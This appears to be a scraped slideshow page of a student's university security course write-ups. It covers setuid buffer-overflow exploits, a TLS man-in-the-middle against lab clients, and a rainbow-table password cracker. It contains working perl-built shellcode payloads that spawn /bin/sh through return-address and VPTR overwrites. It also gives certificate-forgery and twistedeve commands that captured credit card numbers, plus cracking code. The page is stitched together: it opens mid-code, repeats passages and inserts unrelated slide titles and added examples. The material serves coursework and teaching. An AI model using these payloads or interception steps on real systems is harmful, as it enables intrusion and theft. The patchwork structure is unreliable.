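    """Plaintext in position `column` of the chain that begins at `start`."""
    p = start
    for col in range(column):
        p = reduce_hash(H(p), col)
    return p


def chain_end(start, length):
    """Final hash of a chain of `length` hash/reduce steps (what the table stores)."""
    return H(plaintext_at(start, length - 1))


def build_table(starts, length):
    """endpoint hash -> start plaintext.  Only the two ends of every chain are
    kept; the intermediate values are recomputed on demand."""
    table = {}
    for s in starts:
        table.setdefault(chain_end(s, length), s)
    return table


def crack(table, target_hash, length):
    """Recover the plaintext of target_hash if some chain passes through it.
    For each possible column k, extend the target to the end of its would-be
    chain; on an endpoint hit regenerate that chain from its start and look
    for the exact hash (an endpoint hit with no exact match is a false alarm,
    so the search goes on)."""
    for k in range(length):
        h = target_hash
        for col in range(k, length - 1):
            h = H(reduce_hash(h, col))
        start = table.get(h)
        if start is None:
            continue
        p = start
        for col in range(length):
            hp = H(p)
            if hp == target_hash:
                return p
            p = reduce_hash(hp, col)
    return None


if __name__ == "__main__":
    # Constructed toy table: three of the page's start points, chains of 50.
    table = build_table(["AriS1@", "!!!7B0", "zzzyqE"], 50)
    victim = plaintext_at("AriS1@", 7)           # a password the table covers
    print(victim, "->", crack(table, H(victim), 50))
    # The same password with a per-user salt is not covered: the whole table
    # would have to be rebuilt per salt, which is why salted (and slow)
    # password hashes defeat this kind of precomputation.
    print("salted:", crack(table, H("s4lt" + victim), 50))
```

The lookup costs about length^2 / 2 hash operations per candidate hash, which is why the project's 7-second searches at length 10.000 are expected; making the table wider (more starts) rather than longer keeps lookups fast at the cost of disk space.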
After we crack the password we use nc localhost 4433 and enter the password! We
have only 10 seconds to copy the hash, paste it into our program, use the above command and
paste the result, so it is a bit hard... my search function takes an average of 7 seconds
to find the result, so it is kind of HARD!!!
The exercise was developed in C++ on Windows (CodeBlocks) and tested on Linux (Ubuntu);
all my .cpp and .h files are included in my ZIP! My rainbow table is 100MB, so I
cannot include it!
So here is an example of cracking a password from a hash
with my search program..
But again, my rainbow table has 10 billion entries without collisions, so it is a bit small.
Computer Security
Trust boundaries - Confidence 2015Trust boundaries - Confidence 2015
Trust boundaries - Confidence 2015
 
Workshop MSF4J - Getting Started with Microservices and Java
Workshop MSF4J - Getting Started with Microservices and JavaWorkshop MSF4J - Getting Started with Microservices and Java
Workshop MSF4J - Getting Started with Microservices and Java
 
Rust Hack
Rust HackRust Hack
Rust Hack
 
Of the variedtypes of IPC, sockets arout and awaythe foremostcommon..pdf
Of the variedtypes of IPC, sockets arout and awaythe foremostcommon..pdfOf the variedtypes of IPC, sockets arout and awaythe foremostcommon..pdf
Of the variedtypes of IPC, sockets arout and awaythe foremostcommon..pdf
 
Please help with the below 3 questions, the python script is at the.pdf
Please help with the below 3  questions, the python script is at the.pdfPlease help with the below 3  questions, the python script is at the.pdf
Please help with the below 3 questions, the python script is at the.pdf
 
Buffer overflow tutorial
Buffer overflow tutorialBuffer overflow tutorial
Buffer overflow tutorial
 
Alta disponibilidad en GNU/Linux
Alta disponibilidad en GNU/LinuxAlta disponibilidad en GNU/Linux
Alta disponibilidad en GNU/Linux
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
 
Why and How Powershell will rule the Command Line - Barcamp LA 4
Why and How Powershell will rule the Command Line - Barcamp LA 4Why and How Powershell will rule the Command Line - Barcamp LA 4
Why and How Powershell will rule the Command Line - Barcamp LA 4
 
Devoxx France 2018 : Mes Applications en Production sur Kubernetes
Devoxx France 2018 : Mes Applications en Production sur KubernetesDevoxx France 2018 : Mes Applications en Production sur Kubernetes
Devoxx France 2018 : Mes Applications en Production sur Kubernetes
 
Unix executable buffer overflow
Unix executable buffer overflowUnix executable buffer overflow
Unix executable buffer overflow
 
100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects 100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects
 
Linux Kernel, tested by the Linux-version of PVS-Studio
Linux Kernel, tested by the Linux-version of PVS-StudioLinux Kernel, tested by the Linux-version of PVS-Studio
Linux Kernel, tested by the Linux-version of PVS-Studio
 

Computer Security

• 1. Buffer overflows
Knowledge requirements: C/C++, assembly, program memory allocation, Linux permissions.
There are three users on the same Linux machine, each with a secret.txt file. Each of the users (superuser, hyperuser, masteruser) has an executable in their directory which can be executed by all the other users. When executing the program, users will have the owner's permissions and not the permissions of the user executing it.
The goal is to create a shell running from the executables with the victim's privileges by overwriting a useful address/bit.
Superuser: program convert.c, without any protection against buffer overflows.
Hyperuser: program arpsender.c, uses a canary to protect against buffer overflows.
Masteruser: program zoo.cpp, must be exploited using the VPTR.
• 2. Kotsomitopoulos Aristotelis, Project #1, ΥΣ13 ΕΑΡΙΝΟ 2014 (computer system security)
SuperUser
Here we just try to place in the RET address a value inside our buffer's first NOPs, so the instruction pointer will slide until it finds our SHELLCODE!
Our buffer will look like [NOP NOP NOP NOP ... SHELLCODE ... ADDR ADDR ADDR ADDR].
For example we can use an 820-byte buffer to be sure we overwrite the RET value with ADDR. We can use Exploit3.c from Aleph One with value 820 = 720 (our date buffer) + 100 (a good choice), so we easily create the above buffer and we can use:
/home/superuser$ ./convert a $EGG (our environment variable; code at last page)
to open our shell. An alternative way is to work as for the HYPERUSER and create a bash script that simply overwrites the RET value with ADDR in one go (almost the same as Aleph One's approach).
Using the gdb command "info locals" we can find our date buffer's start address and add a small offset to obtain our address, and with "info f" we can check when our RET value is overwritten with the NOPs address or the start of our shellcode, and we are DONE!!
---------------------------------------
supersecret.txt
---------------------------------------
$ cat supersecret.txt
One is is three in any people a of is in called In example read a is the simply into parts to How is each the itself? possible the that about is a interesting discussed later orutnFolvthlleroj
SERIAL:1399762801-c9a58cf2a26af87ec9de1745f2eaed5f298dae7581b6dcd7d77d1eaa33104fad7031c4f9814bdcc3e572b8e0476c1e1aa0c1eb3523756beeaa1b4ee0d67d1c72
• 3. HyperUser
First I exploited hyperuser using the following script. With the above instructions I succeeded in jumping to my RET address without touching the canary, by using a vulnerable pointer.
• 4. Hyperscript.sh (original code at last page)
//chmod +x Hyperscript.sh
#!/bin/bash
`perl -e 'printf
#buffer address before shell code on NOPS
"\x1e\xa0\x04\x08" .
#our 5th letter we wanna have 140 ascii value
chr(140) .
#we add 60 x NOPS
"\x90" x 60 .
#we add Shell Code
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"
#we add 10 x NOPS
"\x90" x 10 .
#we add RET address to our vulnerable pointer
"AAAABAAACAAAAADAAAA\x8c\xf6\xff\xbf";' > output.txt`
---------------------------------------
HYPERSECRET.txt
---------------------------------------
$ cat hypersecret.txt
interesting how possible people, general number to secret text. something cryptography secret this that right simple presented text divided three and three much leaked share secret Is to secret no the leaked share? questions in on! nalisr inengeect
SERIAL:1400202302-bc1977e5b8b6526c4065fc92591f912e95075079bee1f1c6ae6d7b4b40390b9ece61342f212c1f5cf87cb0be4df16698c49f51191d7f417e067bf90db0b7f536
• 5. MasterUser
We overwrite the VPTR at the end of our first buffer[256], and we need to call with "-s" in order for the virtual function to be called. We must create a "virtual vtable" in our buffer to confuse the program: for example, if the pointer tries to call an overloaded operator or a print function from the vtable, it will load our shellcode instead. So our form is as follows.
Using "info f" with a breakpoint at line 13 we can find our THIS address; our class VTABLE starts at 0x804a008, so we want to replace the vptr with 0x804a008+4 so that it points there, and at 0x804a008+4 we will place our NOPs or shellcode address. Let's have a better look:
• 6. So now our SHELLCODE can be executed:
std10048@sbox:/home/masteruser$ ./zoo -c `perl -e 'printf "\x18\xa0\x04\x08\x18\xa0\x04\x08\x18\xa0\x04\x08\x90\x90\x90\x90\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" . "A" x 195 . "\x0c\xa0\x04\x08" x 8 ;'` -s
We could avoid placing 8 copies of the address at the end if we had counted the vptr location exactly, byte by byte.
---------------------------------------
MASTERSECRET.txt
---------------------------------------
$ cat mastersecret.txt
question it for or for of share piece This that is sharing. little you now solution where is vertically different distributed parties. information from about passage it divide so information secret by These will class Cgtao!sog haofpone
SERIAL:1400759702-8f9a1fe300998d1d45bdaf99740699fcc68786fb04d9c83b8056d6839f3aed2c66446bb9d17c5c1cfc6b3c4da35af78504713ab70b4c5082eae2f4ab44c3c7b2
• 7. Final TEXT SUPER+HYPER+MASTER
#include<iostream>
#include<string>
#include<fstream>
using namespace std;
int main(void){
    ifstream super,hyper,master;
    super.open("superuser.txt");
    hyper.open("hyperuser.txt");
    master.open("masteruser.txt");
    string Sword[37],Hword[38],Mword[37]; //wc -w filename.txt
    int i=0;
    while(super >> Sword[i]){ i++; }
    i = 0;
    while(hyper >> Hword[i]){ i++; }
    i = 0;
    while(master >> Mword[i]){ i++; }
    // interleave the three shares word by word
    for (i = 0;i<37; i++){
        cout<<Sword[i]<<" "<<Hword[i]<<" "<<Mword[i]<<" ";
    }
    cout<<Hword[37]<<endl;
    return 0;
}
So our final text:
One interesting question is how it is possible for three people, or in general for any number of people to share a secret piece of text. This is something that in cryptography is called secret sharing. In this little example that you read right now a simple solution is presented where the text is simply divided vertically into three different parts and distributed to three parties. How much information is leaked from each share about the secret passage itself? Is it possible to divide the secret so that no information about the secret is leaked by a share? These interesting questions will discussed in class later on! Cgtao!sog orutnFolvthlleroj nalisr haofpone inengeect
• 9. Man-in-the-middle attack on the TLS (RFC 5246) protocol
An online shop webshop.com at the address https://sbox.di.uoa.gr/ and 6 different clients that try to connect to the webshop via TLS. The webshop has a certificate signed by the certification authority Compsec CA. All clients have access to the self-signed certificate of the Compsec CA. With each ssh connection to sbox.di.uoa.gr the 6 clients will try to connect to the webshop (one at a time).
Display message:
timestamp: XXXXXXXXXX forwarding webshop client requests to port YYYYY
Because of a misconfiguration, clients will try to connect to port YYYYY instead of port 443 of the webshop. So now we have the ability to perform the man-in-the-middle attack.
Difficulty:
1. Mr. Blonde. X
2. Mr. Blue. XX
3. Mr. Brown. XX
4. Mr. Orange. XX
5. Mr. Pink. XXXX
6. Mr. White. XXXXX
• 10. Kotsomitopoulos Aristotelis, Project #2, ΥΣ13 ΕΑΡΙΝΟ 2014 (computer system security)
First let's create a certification authority (CA). My folder is "std10048@sbox:~/myProject2$". We execute the following:
cp /etc/ssl/openssl.cnf . (we modify ./demoCA to ./)
mkdir certs csr newcerts private
echo 00 > serial
echo 00 > crlnumber
touch index.txt
openssl req -new -x509 -extensions v3_ca -keyout private/cakey.key -out cacert.crt -days 3650 -config ./openssl.cnf
openssl ca -gencrl -keyfile private/cakey.key -cert cacert.crt -out crl.pem -config ./openssl.cnf
These are my details for the CA. So now we have our CA and our folders created; they look something like this:
• 11. Now that we have our CA created, let's generate a certificate using our CA. Let's attack Mr. Blond first! He is a really idiotic client; he checks almost nothing, so:
openssl genrsa 1024 > private/MrBlond.key && openssl req -new -key private/MrBlond.key -out csr/MrBlond.csr -config ./openssl.cnf
So now let's continue with this command to complete our generation; for that client we don't even need a certificate verified by the real CA.
openssl ca -config openssl.cnf -policy policy_anything -cert cacert.crt -keyfile private/cakey.key -days 365 -out certs/MrBlond.crt -infiles csr/MrBlond.csr
• 12. So now we have our .crt and our .key:
std10048@sbox:~/myProject2/certs$ cat MrBlond.crt
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 0 (0x0)
    Signature Algorithm: sha1WithRSAEncryption
        Issuer: C=GR, ST=ATTICA, L=Athens, O=University of Athens, OU=Department of Informatics and Telecommunications, CN=SBOX CA/emailAddress=csec.di@gmail.com
        Validity
            Not Before: Jun  7 13:02:45 2014 GMT
            Not After : Jun  7 13:02:45 2015 GMT
        Subject: C=GR, ST=ATTICA, L=Athens, O=Uoa, OU=DiT, CN=idiot_Client/emailAddress=idiot_client@gmail.com
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (1024 bit)
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Basic Constraints:
                CA:FALSE
            Netscape Comment:
                OpenSSL Generated Certificate
            X509v3 Subject Key Identifier:
                7E:B8:D8:FD:79:0C:F0:F2:DC:CE:9D:61:15:5D:91:13:4B:E2:F1:83
            X509v3 Authority Key Identifier:
                keyid:41:DF:39:D0:2D:BB:25:0D:70:38:3B:21:94:B8:C7:39:ED:05:AF:E1
    Signature Algorithm: sha1WithRSAEncryption
• 14. Now we can run twistedeve like this:
command: twistedeve -c certs/MrBlond.crt -k private/MrBlond.key -a localhost:10048 -t localhost:443 -b localhost:46619
so we can be the man in the middle. After the command's execution we open a new terminal, we log in, we find the correct port (46619 this time) for our connection, and our Mr. Blond client has been hacked. So this is the first client's credit card and timestamp:
'cc=4916105057678726&timestamp=1402146284'
Now let's hack Mr. Blue (I named him brown). He is more "clever" than Mr. Blond, but he has another vulnerability: he checks only the name in the certificate. So with our previous CA we create a new certificate, but this time we insert "sbox.di.uoa.gr" in the common name field, so:
• 15. So we simply run twistedeve again:
twistedeve -c certs/brown.crt -k private/brown.key -a localhost:10048 -t localhost:443 -b localhost:48211
so we can observe Mr. Blue's credit card and timestamp:
'cc=4556270584159924&timestamp=1402148722'
Now let's hack Mr. Brown. We know that webshop and mysite both have the same certification authority (SBOX CA), so Mr. Brown checks only whether our .crt and .key are verified by SBOX CA and nothing more, so:
SBOX CA: mysite.com, webshop.com
We use twistedeve with /var/project2/mysite.com.crt and /var/project2/mysite.com.key, and now we can get Mr. Brown's credit card!
• 16. Command:
twistedeve -c /var/project2/mysite.com.crt -k /var/project2/mysite.com.key -a localhost:10048 -t localhost:443 -b localhost:46749
So here is the credit card & timestamp for Mr. Brown:
'cc=4539346713524865&timestamp=1402150208'
Mr. Orange now: we will use a certificate chain. We now know how to create a CA, generate certificates and sign them, so let's try something different! In our new folder, after these commands:
cp /etc/ssl/openssl.cnf .
mkdir certs csr newcerts private
echo 00 > serial
echo 00 > crlnumber
touch index.txt
instead of using:
openssl req -new -x509 -extensions v3_ca -keyout private/cakey.key -out cacert.crt -days 3650 -config ./openssl.cnf
• 17. (the above command would create a brand new cakey.key and cacert.crt) we will use our existing ones from mysite.com. So we navigate to /var/project2/ and copy our mysite.com.key and mysite.com.crt. Now let's create the two files needed by our next command: we create cacert.crt and private/cakey.key and paste in the contents copied from mysite. Now we can use the generation command with our custom files!
openssl ca -gencrl -keyfile private/cakey.key -cert cacert.crt -out crl.pem -config ./openssl.cnf
Now we will generate our certificate using the above CA:
openssl genrsa 1024 > private/sbox.di.uoa.gr.key && openssl req -new -key private/sbox.di.uoa.gr.key -out csr/sbox.di.uoa.gr.csr -config ./openssl.cnf
openssl ca -config openssl.cnf -policy policy_anything -cert cacert.crt -keyfile private/cakey.key -days 365 -out certs/sbox.di.uoa.gr.crt -infiles csr/sbox.di.uoa.gr.csr
• 18. So now let's create our certificate chain: we will paste the plain mysite.com certificate into our certs/sbox.di.uoa.gr.crt, so the expected confusion will occur on the client's side and our "man in the middle" will obtain the victim's credit card number.
-----BEGIN CERTIFICATE-----
..... our above created certificate code .....
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
..... mysite.com certificate code .....
-----END CERTIFICATE-----
• 19. So our file will look something like this: our certificate followed by the one copied from mysite.com.crt. Now we can start twistedeve and try our .crt and .key; let's see:
twistedeve -c certs/sbox.di.uoa.gr.crt -k private/sbox.di.uoa.gr.key -a localhost:10048 -t localhost:443 -b localhost:41866
Our man in the middle listens on port 41866; we log in and realise that Mr. Orange has been hacked.
• 20. Credit card: successful attack! So our credit card number & timestamp is:
'c=4716666995541278&timestamp=1402231087'
For Mr. Pink now, let's try to use twistedeve with a filter and without using a certificate:
twistedeve -c -f /var/project2/filters/tlsinfo.py -a localhost:10048 -t localhost:443 -b localhost:41866
so we can see what protocols, cipher suites etc. the client and server support. We can see that client 5, Mr. Pink, uses TLS_DH_anon_WITH_AES... So here is the problem: we can create a custom openssl server that will listen on port "4444", then we will redirect our users to that port with twistedeve, and our openssl server will be set with the "no certificate is used" option. This restricts the cipher suites available to the anonymous ones (currently just anonymous DH).
• 21. Here we can see that we use DH_anon! So now let's create our openssl server:
openssl s_server -accept 44444 -nocert -cipher DH
(cipher suites using DH, including anonymous DH)
So now we can run twistedeve like this:
twistedeve -c -a localhost:10048 -t localhost:44444 -b localhost:43566 (clients' port)
So let's run our clients against port 43566 with our server and twistedeve open (we need three terminals). ALL clients will fail except Mr. Pink, so we will be able to steal his credit card!
• 22. Mr. Pink's request was sent; everything else failed! So Mr. Pink's credit card & timestamp is:
4486750853453368&timestamp=1402274478
Mr. White has complete TLS protection, so he needs a more powerful hacker to be hacked!!!
• 23. Rainbow Tables
Kotsomitopoulos Aristotelis, Project #3, ΥΣ13 ΕΑΡΙΝΟ 2014 (Computer System Security)
I want to hack a password of 6 chars; those chars must have been drawn from the given alphabet.
Alphabet (64): "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@"
So a password example can be "AriS1@". In order to hack this password I will use rainbow tables! Passwords are stored as the output of a hash function. Hashes are one-way operations: even if an attacker gained access to the hashed version of your password, it's not possible to reconstitute the password from the hash value alone, but it is possible to attack the hashed value of your password using rainbow tables.
We have 64^6 different passwords = 68.719.476.736 = 69 billion different passwords.
First of all I create, for example, 1.000.000 different passwords 6 chars long, and these will be the starts of my chains, something like:
!!!7B0 !!!80! QBLfQU VM7Ucl eORyLL lXO8rC t9p48R 8Qi!cm 8QjgAU I3m2Zn .....
Now for every plaintext of the above we will create a chain:
plaintext -> hash = blake(plaintext) -> new_plaintext = my_reduction_function(hash) -> hash = blake(new_plaintext) -> repeat ... -> ... -> ...
In my program I create a chain 10.000 long, so for every plaintext I use
• 24. blake + my_reduction_function (10000 times). Finally I will have almost 1.000.000 x 10000 = 10 billion different values (without collisions), so if we had 1 password given I have a 1/7 chance to hack it; but now I have more than 15 passwords given, so that size is enough with a bit of luck... Generating a rainbow table of that size took more than 16 hours. In my opinion the best size for this problem would be 5 million x 10.000, but that needs a lot of time to be generated even with threads and a multicore processor!
So after that huge generation I place the results in a .txt file, and my search-find password program will use that table to hack the password. The file (output_1mX10000.txt) holds one line per chain: the chain's start plaintext, its final hash and the chain number.
In order to reduce collisions I tried a lot of different reduction functions with a lot of tests. My final function, in order to produce 6-char random passwords from a given 64-char hash: I map every char of the hash (16 different chars, 0123456789abcdef) onto my alphabet "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@". I add the first 10 hash chars (e.g. 0Fa2.. = 0+15+10+2..) and then XOR with the sum of the next 10; in that way I produce a number, and that number MOD 64 gives me an index inside my alphabet (for example 63 is '@'!). For the 6th char I use the last 4 characters + the first 6. In that way I produce a deterministic "random" string (plaintext) for my chain!
#include <string>
using namespace std;
string plaintext_from_hash3(string my_hash){
    string charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@";
    string result;
    int sum = 0;
    int counter=0;
    /* this is for our last XOR: the last 4 chars + the first 6 (raw char codes) */
    int last_digits = my_hash[60]+my_hash[61]+my_hash[62]+my_hash[63];
    for(int i=0; i<6; i++) last_digits += my_hash[i];
    /* this is for our 5 XORs: sum of the hex digit values in each 10-char window */
    int for_XOR[6];
    for(int i=0; i<6; i++){
        sum=0;
        for(int j=0; j<10; j++){
            if(my_hash[counter] == '0') sum += 0;
            else if(my_hash[counter] == '1') sum += 1;
            else if(my_hash[counter] == '2') sum += 2;
            else if(my_hash[counter] == '3') sum += 3;
            else if(my_hash[counter] == '4') sum += 4;
            else if(my_hash[counter] == '5') sum += 5;
            else if(my_hash[counter] == '6') sum += 6;
            else if(my_hash[counter] == '7') sum += 7;
            else if(my_hash[counter] == '8') sum += 8;
            else if(my_hash[counter] == '9') sum += 9;
            else if(my_hash[counter] == 'a') sum += 10;
            else if(my_hash[counter] == 'b') sum += 11;
            else if(my_hash[counter] == 'c') sum += 12;
            else if(my_hash[counter] == 'd') sum += 13;
            else if(my_hash[counter] == 'e') sum += 14;
            else if(my_hash[counter] == 'f') sum += 15;
            counter++;
        }
        for_XOR[i] = sum;
    }
    /* each output char: XOR of two adjacent sums, reduced modulo 64 into the alphabet */
    int res;
    res = for_XOR[0] ^ for_XOR[1]; //1st XOR
    if(res<0) res=-res;
    result+=charset[res%64];
    res = for_XOR[1] ^ for_XOR[2]; //2nd XOR
    if(res<0) res=-res;
    result+=charset[res%64];
    res = for_XOR[2] ^ for_XOR[3]; //3rd XOR
    if(res<0) res=-res;
    result+=charset[res%64];
    res = for_XOR[3] ^ for_XOR[4]; //4th XOR
    if(res<0) res=-res;
    result+=charset[res%64];
    res = for_XOR[4] ^ for_XOR[5]; //5th XOR
    if(res<0) res=-res;
    result+=charset[res%64];
    res = for_XOR[5] ^ last_digits; //6th XOR
    if(res<0) res=-res;
    result+=charset[res%64];
    return result;
}
Let's assume for example that after we use dbus-monitor on sbox.di.uoa.gr we get the
• 26. following hash:
9b465fce3fd32aa5531f801d4c63f31380adc84c62f0d170aaf535619b85a928
So we will search whether the above hash is in our table. IF WE FIND IT, we will use the chain's start plaintext to obtain the password: we apply blake -> reduction -> blake -> reduction ... until we find our first hash (in our case it would be the last one), so the plaintext that produced this hash is our hacked password! If we don't match the above hash with our rainbow table hashes, then we apply the reduction function to our hash, then blake, and then we try to find it again; if we find it, we search along the matching chain until we find the FIRST hash (not the new one). If we fail again we continue hashing and reducing our given hash until we find a chain match in the rainbow table. If, in my situation, we do 10.000 loops and don't find a match, then we have failed and that password can't be hacked with my table. Now, if we find a match but after expanding the matching chain 10.000 times we don't find our FIRST hash, we don't stop; we continue expanding and searching for another chain MATCH!! If we check every possible chain and the FIRST hash isn't there, then the password cannot be hacked with that rainbow table; if we had used a bigger one it would be almost 100% certain our password would be hacked!
After we hack the password we use nc localhost 4433 and we enter the password! We have only 10 seconds to copy the hash + paste it into our program + use the above command + paste the result, so it's a bit hard. My search function takes an average of 7 seconds to find the result, so it's kinda HARD!!!
The exercise was developed using C++ on Windows (CodeBlocks) and tested on Linux Ubuntu; all my .cpp and .h files are included in my ZIP! My rainbow table is 100MB in size so I can't include it! So here is an example of hacking a password from a hash with my search program. But again, my rainbow table has 10 billion entries without collisions, so it's a bit small.
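The chain construction and lookup described above, as an added example that is not the project's own code: it ports the page's plaintext_from_hash3 reduction to Python, uses Python's hashlib.blake2s as a stand-in for the page's "blake" (an assumption; it also gives a 64-hex-character digest), builds a small table from constructed chain starts, recovers an unsalted hash, and then shows that the same table returns nothing once a per-user salt is added.

```python
import hashlib

# The page's 64-character alphabet; passwords are 6 characters drawn from it.
CHARSET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@"
PW_LEN = 6


def blake(plaintext: str) -> str:
    """Assumption: Python's blake2s stands in for the page's 'blake'; it also
    yields a 64-hex-character (256-bit) digest, which the reduction expects."""
    return hashlib.blake2s(plaintext.encode()).hexdigest()


def plaintext_from_hash3(my_hash: str) -> str:
    """Port of the page's reduction function: 64 hex chars -> 6 alphabet chars."""
    assert len(my_hash) == 64
    # Sum of the hex digit values in each of the six 10-character windows.
    sums = [sum(int(c, 16) for c in my_hash[10 * i:10 * i + 10]) for i in range(6)]
    # The C++ code adds raw character codes (not hex values) of the last 4 and
    # the first 6 characters to form the final term.
    last_digits = sum(ord(c) for c in my_hash[60:64] + my_hash[:6])
    terms = sums + [last_digits]
    # Each output character is the XOR of two adjacent terms, taken modulo 64.
    return "".join(CHARSET[(terms[i] ^ terms[i + 1]) % 64] for i in range(PW_LEN))


def chain_plaintexts(start: str, chain_len: int) -> list:
    """The plaintexts of one chain: start, reduce(blake(start)), ... (chain_len of them)."""
    chain = [start]
    for _ in range(chain_len - 1):
        chain.append(plaintext_from_hash3(blake(chain[-1])))
    return chain


def build_table(starts, chain_len: int) -> dict:
    """Precompute: map each chain's final hash to its start plaintext.
    This is what the page's output_1mX10000.txt stores, one chain per line."""
    table = {}
    for start in starts:
        end_hash = blake(chain_plaintexts(start, chain_len)[-1])
        # Keep the first chain seen for an endpoint. Because the page reuses the
        # same reduction at every position, colliding chains merge and the table
        # cannot tell them apart; a true rainbow table varies the reduction per column.
        table.setdefault(end_hash, start)
    return table


def lookup(table: dict, target_hash: str, chain_len: int):
    """Recover a plaintext whose blake() equals target_hash, or None.
    Follows the page's procedure: extend the target hash step by step until it
    hits a stored endpoint, then replay that chain from its start."""
    h = target_hash
    for _ in range(chain_len):
        if h in table:
            p = table[h]
            for _ in range(chain_len):
                hp = blake(p)
                if hp == target_hash:
                    return p
                p = plaintext_from_hash3(hp)
            # False alarm from a merged chain: keep extending, as the page does.
        h = blake(plaintext_from_hash3(h))
    return None


def demo_starts(n: int) -> list:
    """Constructed, deterministic chain starts (the page used 1,000,000 random ones)."""
    return [plaintext_from_hash3(blake("start-%d" % i)) for i in range(n)]


if __name__ == "__main__":
    CHAIN_LEN = 40  # constructed demo size; the page used chains of 10,000
    starts = demo_starts(300)
    table = build_table(starts, CHAIN_LEN)
    # Constructed victim: a password that happens to lie inside the first chain.
    victim = chain_plaintexts(starts[0], CHAIN_LEN)[7]
    print("unsalted hash recovered:", lookup(table, blake(victim), CHAIN_LEN))
    # Mitigation check: a per-user salt puts the hash outside every precomputed chain.
    print("salted hash recovered:", lookup(table, blake("salt:" + victim), CHAIN_LEN))
```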